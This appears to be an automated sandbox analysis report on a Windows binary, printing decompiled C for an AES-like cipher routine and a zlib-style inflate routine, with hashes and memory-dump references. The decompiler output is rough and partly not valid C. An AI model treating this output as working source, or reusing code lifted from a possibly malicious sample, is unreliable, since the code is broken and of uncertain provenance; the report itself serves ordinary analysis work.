Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v48;
				signed char* _t154;
				signed char* _t157;
				signed char* _t158;
				signed char* _t161;
				signed char* _t162;
				signed char* _t165;
				signed int _t169;
				signed int _t170;
				signed char* _t175;
				signed int _t243;
				signed int _t278;
				signed int _t288;
				signed int _t302;
				signed int* _t328;
				signed int _t332;
				signed int* _t342;
				intOrPtr _t343;
				void* _t344;
				signed int _t345;

				_t343 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v48);
					L0040776E();
				}
				_t154 = _a4;
				_t157 =  &(_t154[3]);
				_t158 =  &(_t157[1]);
				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
				_v24 = _t243;
				_t161 =  &(_t158[3]);
				_t162 =  &(_t161[1]);
				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
				_t165 =  &(_t162[3]);
				_t166 =  &(_t165[1]);
				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
				_t169 =  *(_t343 + 0x410);
				_v36 = _t169;
				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
				if(_t169 > 1) {
					_t328 = _t343 + 0x210;
					_a4 = _t328;
					_v8 = _t169 - 1;
					do {
						_t332 =  *0x00409BFC ^  *0x00409FFC;
						_v28 = _t332;
						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
						_v12 = _v28;
						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
						_t342 = _a4;
						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
						_t328 = _t342 + 0x20;
						_t82 =  &_v8;
						 *_t82 = _v8 - 1;
						_a4 = _t328;
						_v24 = _t243;
					} while ( *_t82 != 0);
					_t343 = _v32;
					_t169 = _v36;
				}
				_t170 = _t169 << 5;
				_t278 =  *(_t343 + 0x1e8 + _t170);
				_t344 = _t343 + 0x1e8 + _t170;
				_v8 = _t278;
				_t175 = _a8;
				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
				_t288 =  *(_t344 + 4);
				_v8 = _t288;
				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
				_t302 =  *(_t344 + 8);
				_v8 = _t302;
				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
				_t345 =  *(_t344 + 0xc);
				_v8 = _t345;
				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
				return _t175;
			}

0x004031c3
0x004031c5
0x004031cc
0x004031d6
0x004031df
0x004031e4
0x004031e5
0x004031e5
0x004031ea
0x00403206
0x00403210
0x00403211
0x0040321f
0x0040322e
0x00403234
0x0040323f
0x00403255
0x0040325b
0x00403266
0x0040327d
0x00403285
0x00403296
0x00403299
0x0040329f
0x004032a6
0x004032a9
0x004032ac
0x00403323
0x0040332f
0x0040334b
0x0040335a
0x0040336c
0x0040337b
0x00403385
0x00403388
0x0040338b
0x0040338e
0x0040338e
0x00403391
0x00403394
0x00403394
0x0040339d
0x004033a0
0x004033a0
0x004033a3
0x004033a6
0x004033ad
0x004033bb
0x004033cb
0x004033ce
0x004033e5
0x004033f8
0x0040340c
0x0040340f
0x00403418
0x00403425
0x00403439
0x0040344e
0x00403462
0x00403465
0x0040346e
0x0040347b
0x0040348f
0x004034a1
0x004034b5
0x004034b8
0x004034c2
0x004034d2
0x004034e7
0x004034fb
0x00403508
0x0040350c

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84

Uniqueness

Uniqueness Score: -1.00%

Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E004043B7() {
				void* __ebx;
				void** __edi;
				void* __esi;
				signed int _t426;
				signed int _t427;
				void* _t434;
				signed int _t436;
				unsigned int _t438;
				void* _t442;
				void* _t448;
				void* _t455;
				signed int _t456;
				signed int _t461;
				signed char* _t476;
				signed int _t482;
				signed int _t485;
				signed int* _t488;
				void* _t490;
				void* _t492;
				void* _t493;

				_t490 = _t492;
				_t493 = _t492 - 0x2c;
				_t488 =  *(_t490 + 8);
				_t485 =  *(_t490 + 0xc);
				_t482 = _t488[0xd];
				_t476 =  *_t485;
				 *(_t490 - 4) =  *(_t485 + 4);
				 *(_t490 + 8) = _t488[8];
				 *(_t490 + 0xc) = _t488[7];
				_t426 = _t488[0xc];
				 *(_t490 - 8) = _t482;
				if(_t482 >= _t426) {
					_t479 = _t488[0xb] - _t482;
					__eflags = _t479;
				} else {
					_t479 = _t426 - _t482 - 1;
				}
				_t427 =  *_t488;
				 *(_t490 - 0x10) = _t479;
				if(_t427 > 9) {
					L99:
					_push(0xfffffffe);
					_t488[8] =  *(_t490 + 8);
					_t488[7] =  *(_t490 + 0xc);
					 *(_t485 + 4) =  *(_t490 - 4);
					 *_t485 = _t476;
					_t320 = _t485 + 8;
					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
					__eflags =  *_t320;
					_t488[0xd] =  *(_t490 - 8);
					goto L100;
				} else {
					while(1) {
						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
							case 0:
								goto L7;
							case 1:
								goto L20;
							case 2:
								goto L27;
							case 3:
								goto L50;
							case 4:
								goto L58;
							case 5:
								goto L68;
							case 6:
								goto L92;
							case 7:
								goto L118;
							case 8:
								goto L122;
							case 9:
								goto L104;
						}
						L92:
						__eax =  *(__ebp + 8);
						 *(__esi + 0x20) =  *(__ebp + 8);
						__eax =  *(__ebp + 0xc);
						 *(__esi + 0x1c) =  *(__ebp + 0xc);
						__eax =  *(__ebp - 4);
						__edi[1] =  *(__ebp - 4);
						__ebx = __ebx -  *__edi;
						 *__edi = __ebx;
						__edi[2] = __edi[2] + __ebx -  *__edi;
						__eax =  *(__ebp - 8);
						 *(__esi + 0x34) =  *(__ebp - 8);
						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
						__eflags = __eax - 1;
						if(__eax != 1) {
							L120:
							_push(__eax);
							L100:
							_push(_t485);
							_push(_t488);
							_t434 = E00403BD6(_t479);
							L101:
							return _t434;
						}
						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
						E004042AF( *(__esi + 4), __edi) = __edi[1];
						__ebx =  *__edi;
						 *(__ebp - 4) = __edi[1];
						__eax =  *(__esi + 0x20);
						_pop(__ecx);
						 *(__ebp + 8) =  *(__esi + 0x20);
						__eax =  *(__esi + 0x1c);
						_pop(__ecx);
						__ecx =  *(__esi + 0x34);
						 *(__ebp + 0xc) =  *(__esi + 0x1c);
						__eax =  *(__esi + 0x30);
						 *(__ebp - 8) = __ecx;
						__eflags = __ecx - __eax;
						if(__ecx >= __eax) {
							__eax =  *(__esi + 0x2c);
							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
							__eflags = __eax;
						} else {
							__eax = __eax - __ecx;
							__eax = __eax - 1;
						}
						__eflags =  *(__esi + 0x18);
						 *(__ebp - 0x10) = __eax;
						if( *(__esi + 0x18) != 0) {
							 *__esi = 7;
							goto L118;
						} else {
							 *__esi =  *__esi & 0x00000000;
							__eflags =  *__esi;
							L98:
							_t427 =  *_t488;
							__eflags = _t427 - 9;
							if(_t427 <= 9) {
								_t479 =  *(_t490 - 0x10);
								continue;
							}
							goto L99;
						}
						while(1) {
							L68:
							__eax =  *(__esi + 4);
							__ecx =  *(__esi + 8);
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							__edx = __edx & 0x0000001f;
							_t187 = __eax + 0x102; // 0x102
							__eax = __edx + _t187;
							__eflags = __ecx - __edx + _t187;
							if(__ecx >= __edx + _t187) {
								break;
							}
							__eax =  *(__esi + 0x10);
							while(1) {
								__eflags =  *(__ebp + 0xc) - __eax;
								if( *(__ebp + 0xc) >= __eax) {
									break;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									L107:
									_t488[8] =  *(_t490 + 8);
									_t488[7] =  *(_t490 + 0xc);
									_t349 = _t485 + 4;
									 *_t349 =  *(_t485 + 4) & 0x00000000;
									__eflags =  *_t349;
									L108:
									_push( *(_t490 + 0x10));
									 *_t485 = _t476;
									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
									_t488[0xd] =  *(_t490 - 8);
									goto L100;
								}
								__edx =  *__ebx & 0x000000ff;
								__ecx =  *(__ebp + 0xc);
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__edx = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
							}
							__eax =  *(0x40bca8 + __eax * 4);
							__ecx =  *(__esi + 0x14);
							__eax = __eax &  *(__ebp + 8);
							__edx =  *(__ecx + 4 + __eax * 8);
							__eax = __ecx + __eax * 8;
							__eflags = __edx - 0x10;
							 *(__ebp - 0x14) = __edx;
							__ecx =  *(__eax + 1) & 0x000000ff;
							 *(__ebp - 0xc) = __ecx;
							if(__edx >= 0x10) {
								__eflags = __edx - 0x12;
								if(__edx != 0x12) {
									_t222 = __edx - 0xe; // -14
									__eax = _t222;
								} else {
									__eax = 7;
								}
								__ecx = 0;
								__eflags = __edx - 0x12;
								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
								__eflags = __ecx;
								 *(__ebp - 0x10) = __ecx;
								while(1) {
									__ecx =  *(__ebp - 0xc);
									__edx = __eax + __ecx;
									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
									if( *(__ebp + 0xc) >= __eax + __ecx) {
										break;
									}
									__eflags =  *(__ebp - 4);
									if( *(__ebp - 4) == 0) {
										goto L107;
									}
									__edx =  *__ebx & 0x000000ff;
									__ecx =  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									__edx = ( *__ebx & 0x000000ff) << __cl;
									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
									__ebx = __ebx + 1;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								}
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
								__ecx = __eax;
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								__ecx =  *(__ebp - 0xc);
								__eax = __eax +  *(__ebp - 0xc);
								__ecx =  *(__esi + 8);
								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
								__eax =  *(__esi + 4);
								__edx = __eax;
								__eax = __eax & 0x0000001f;
								__edx = __edx >> 5;
								__edx = __edx & 0x0000001f;
								_t254 = __eax + 0x102; // 0x102
								__eax = __edx + _t254;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
								if( *(__ebp - 0x10) + __ecx > __eax) {
									L111:
									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
									 *__esi = 9;
									__edi[6] = "invalid bit length repeat";
									 *(__esi + 0x20) =  *(__ebp + 8);
									__eax =  *(__ebp + 0xc);
									 *(__esi + 0x1c) =  *(__ebp + 0xc);
									__eax =  *(__ebp - 4);
									__edi[1] =  *(__ebp - 4);
									__ebx = __ebx -  *__edi;
									 *__edi = __ebx;
									__edi[2] = __edi[2] + __ebx -  *__edi;
									__eax =  *(__ebp - 8);
									 *(__esi + 0x34) =  *(__ebp - 8);
									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
									goto L101;
								}
								__eflags =  *(__ebp - 0x14) - 0x10;
								if( *(__ebp - 0x14) != 0x10) {
									__eax = 0;
									__eflags = 0;
									do {
										L87:
										__edx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
										__ecx = __ecx + 1;
										_t264 = __ebp - 0x10;
										 *_t264 =  *(__ebp - 0x10) - 1;
										__eflags =  *_t264;
									} while ( *_t264 != 0);
									 *(__esi + 8) = __ecx;
									continue;
								}
								__eflags = __ecx - 1;
								if(__ecx < 1) {
									goto L111;
								}
								__eax =  *(__esi + 0xc);
								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
								goto L87;
							}
							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
							__eax = __ecx;
							__ecx =  *(__esi + 0xc);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
							__eax =  *(__esi + 8);
							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
							 *(__esi + 8) =  *(__esi + 8) + 1;
						}
						__ecx = __ebp - 0x28;
						__eax =  *(__esi + 4);
						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
						 *(__ebp - 0x14) = 9;
						__ebp - 0x2c = __ebp - 0x10;
						__ecx = __ebp - 0x14;
						__ecx = __eax;
						__eax = __eax & 0x0000001f;
						__ecx = __ecx >> 5;
						__ecx = __ecx & 0x0000001f;
						__eax = __eax + 0x101;
						__ecx = __ecx + 1;
						 *(__ebp - 0x10) = 6;
						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
						 *(__ebp - 0xc) = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
							L113:
							if(__eflags == 0) {
								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
								_pop(__ecx);
								 *__esi = 9;
								_pop(__ecx);
							}
							__eax =  *(__ebp + 8);
							_push( *(__ebp - 0xc));
							 *(__esi + 0x20) =  *(__ebp + 8);
							__eax =  *(__ebp + 0xc);
							 *(__esi + 0x1c) =  *(__ebp + 0xc);
							__eax =  *(__ebp - 4);
							__edi[1] =  *(__ebp - 4);
							__ebx = __ebx -  *__edi;
							 *__edi = __ebx;
							__edi[2] = __edi[2] + __ebx -  *__edi;
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							goto L100;
						}
						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
						__eflags = __eax;
						if(__eax == 0) {
							L116:
							_push(0xfffffffc);
							_t488[8] =  *(_t490 + 8);
							_t488[7] =  *(_t490 + 0xc);
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						 *(__esi + 4) = __eax;
						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
						_pop(__ecx);
						 *__esi = 6;
						_pop(__ecx);
						goto L92;
						L58:
						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
						__eax = ( *(__esi + 4) >> 0xa) + 4;
						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
							while(1) {
								L64:
								__eflags =  *(__esi + 8) - 0x13;
								if( *(__esi + 8) >= 0x13) {
									break;
								}
								__eax =  *(__esi + 8);
								__ecx =  *(__esi + 0xc);
								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
								 *(__esi + 8) =  *(__esi + 8) + 1;
							}
							__ecx = __esi + 0x14;
							__eax = __esi + 0x10;
							 *(__esi + 0x10) = 7;
							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
							 *(__ebp - 0xc) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
								goto L113;
							}
							_t182 = __esi + 8;
							 *_t182 =  *(__esi + 8) & __eax;
							__eflags =  *_t182;
							 *__esi = 5;
							goto L68;
						} else {
							goto L59;
						}
						do {
							L59:
							__ecx =  *(__ebp + 0xc);
							while(1) {
								__eflags = __ecx - 3;
								if(__ecx >= 3) {
									goto L63;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									goto L107;
								}
								__eax =  *__ebx & 0x000000ff;
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__eax = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								__ecx = __ecx + 8;
								 *(__ebp + 0xc) = __ecx;
							}
							L63:
							__ecx =  *(__esi + 8);
							__eax =  *(__ebp + 8);
							__edx =  *(__esi + 0xc);
							__eax =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(__esi + 4);
							 *(__esi + 8) =  *(__esi + 8) + 1;
							__eax =  *(__esi + 8);
							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
						goto L64;
						L50:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0xe;
							if(__ecx >= 0xe) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__eax =  *(__ebp + 8);
						__eax =  *(__ebp + 8) & 0x00003fff;
						__ecx = __eax;
						 *(__esi + 4) = __eax;
						__ecx = __eax & 0x0000001f;
						__eflags = __ecx - 0x1d;
						if(__ecx > 0x1d) {
							L109:
							 *__esi = 9;
							__edi[6] = "too many length or distance symbols";
							break;
						}
						__eax = __eax & 0x000003e0;
						__eflags = (__eax & 0x000003e0) - 0x3a0;
						if((__eax & 0x000003e0) > 0x3a0) {
							goto L109;
						}
						__eax = __eax >> 5;
						__eax = __eax & 0x0000001f;
						__eax = __edi[8](__edi[0xa], __eax, 4);
						__esp = __esp + 0xc;
						 *(__esi + 0xc) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L116;
						}
						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
						_t138 = __esi + 8;
						 *_t138 =  *(__esi + 8) & 0x00000000;
						__eflags =  *_t138;
						 *__esi = 4;
						goto L58;
						L27:
						__eflags =  *(__ebp - 4);
						if( *(__ebp - 4) == 0) {
							goto L107;
						}
						__eflags = __ecx;
						if(__ecx != 0) {
							L44:
							__eax =  *(__esi + 4);
							__ecx =  *(__ebp - 4);
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							__eflags = __eax - __ecx;
							 *(__ebp - 0xc) = __eax;
							if(__eax > __ecx) {
								 *(__ebp - 0xc) = __ecx;
							}
							__eax =  *(__ebp - 0x10);
							__eflags =  *(__ebp - 0xc) - __eax;
							if( *(__ebp - 0xc) > __eax) {
								 *(__ebp - 0xc) = __eax;
							}
							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
							__eax =  *(__ebp - 0xc);
							__esp = __esp + 0xc;
							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
							__ebx = __ebx + __eax;
							_t115 = __esi + 4;
							 *_t115 =  *(__esi + 4) - __eax;
							__eflags =  *_t115;
							if( *_t115 == 0) {
								L49:
								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
								asm("sbb eax, eax");
								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
								L16:
								 *_t488 = _t456;
							}
							goto L98;
						}
						__ecx =  *(__esi + 0x2c);
						__eflags = __edx - __ecx;
						if(__edx != __ecx) {
							L35:
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
							__ecx =  *(__esi + 0x30);
							 *(__ebp + 0x10) = __eax;
							__eax =  *(__esi + 0x34);
							__eflags = __eax - __ecx;
							 *(__ebp - 8) = __eax;
							if(__eax >= __ecx) {
								__edx =  *(__esi + 0x2c);
								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
								__eflags = __edx;
								 *(__ebp - 0x10) = __edx;
							} else {
								__ecx = __ecx -  *(__ebp - 8);
								__eax = __ecx -  *(__ebp - 8) - 1;
								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
							}
							__edx =  *(__esi + 0x2c);
							__eflags =  *(__ebp - 8) - __edx;
							if( *(__ebp - 8) == __edx) {
								__eax =  *(__esi + 0x28);
								__eflags = __eax - __ecx;
								if(__eflags != 0) {
									 *(__ebp - 8) = __eax;
									if(__eflags >= 0) {
										__edx = __edx - __eax;
										__eflags = __edx;
										 *(__ebp - 0x10) = __edx;
									} else {
										__ecx = __ecx - __eax;
										__ecx = __ecx - 1;
										 *(__ebp - 0x10) = __ecx;
									}
								}
							}
							__eflags =  *(__ebp - 0x10);
							if( *(__ebp - 0x10) == 0) {
								__eax =  *(__ebp + 8);
								 *(__esi + 0x20) =  *(__ebp + 8);
								__eax =  *(__ebp + 0xc);
								 *(__esi + 0x1c) =  *(__ebp + 0xc);
								__eax =  *(__ebp - 4);
								__edi[1] =  *(__ebp - 4);
								goto L108;
							} else {
								goto L44;
							}
						}
						__eax =  *(__esi + 0x30);
						__edx =  *(__esi + 0x28);
						__eflags = __edx - __eax;
						if(__eflags == 0) {
							goto L35;
						}
						 *(__ebp - 8) = __edx;
						if(__eflags >= 0) {
							__ecx = __ecx - __edx;
							__eflags = __ecx;
							 *(__ebp - 0x10) = __ecx;
						} else {
							__eax = __eax - __edx;
							 *(__ebp - 0x10) = __eax;
						}
						__eflags =  *(__ebp - 0x10);
						if( *(__ebp - 0x10) != 0) {
							goto L44;
						} else {
							goto L35;
						}
						L20:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0x20;
							if(__ecx >= 0x20) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__ecx =  *(__ebp + 8);
						__eax =  *(__ebp + 8);
						__ecx =  !( *(__ebp + 8));
						__eax =  *(__ebp + 8) & 0x0000ffff;
						__ecx =  !( *(__ebp + 8)) >> 0x10;
						__ecx =  !( *(__ebp + 8)) >> 0x00000010 ^ __eax;
						__eflags = __ecx;
						if(__ecx != 0) {
							 *__esi = 9;
							__edi[6] = "invalid stored block lengths";
							break;
						}
						 *(__esi + 4) = __eax;
						__eax = 0;
						__eflags =  *(__esi + 4);
						 *(__ebp + 0xc) = 0;
						 *(__ebp + 8) = 0;
						if( *(__esi + 4) == 0) {
							goto L49;
						}
						__eax = 2;
						goto L16;
						L7:
						while( *(_t490 + 0xc) < 3) {
							if( *(_t490 - 4) == 0) {
								goto L107;
							}
							_t479 =  *(_t490 + 0xc);
							 *(_t490 + 0x10) =  *(_t490 + 0x10) & 0x00000000;
							 *(_t490 - 4) =  *(_t490 - 4) - 1;
							 *(_t490 + 8) =  *(_t490 + 8) | ( *_t476 & 0x000000ff) <<  *(_t490 + 0xc);
							_t476 =  &(_t476[1]);
							 *(_t490 + 0xc) =  *(_t490 + 0xc) + 8;
						}
						_t436 =  *(_t490 + 8) & 0x00000007;
						_t479 = _t436 & 0x00000001;
						_t438 = _t436 >> 1;
						__eflags = _t438;
						_t488[6] = _t436 & 0x00000001;
						if(_t438 == 0) {
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - 3;
							 *_t488 = 1;
							_t479 =  *(_t490 + 0xc) & 0x00000007;
							 *(_t490 + 0xc) =  *(_t490 + 0xc) - _t479;
							 *(_t490 + 8) =  *(_t490 + 8) >> 3 >> _t479;
							goto L98;
						}
						_t442 = _t438 - 1;
						__eflags = _t442;
						if(_t442 == 0) {
							_push(_t485);
							E00405122(_t490 - 0x24, _t490 - 0x20, _t490 - 0x1c, _t490 - 0x18);
							_t448 = E00403CC8( *((intOrPtr*)(_t490 - 0x24)),  *((intOrPtr*)(_t490 - 0x20)),  *((intOrPtr*)(_t490 - 0x1c)),  *((intOrPtr*)(_t490 - 0x18)), _t485);
							_t493 = _t493 + 0x28;
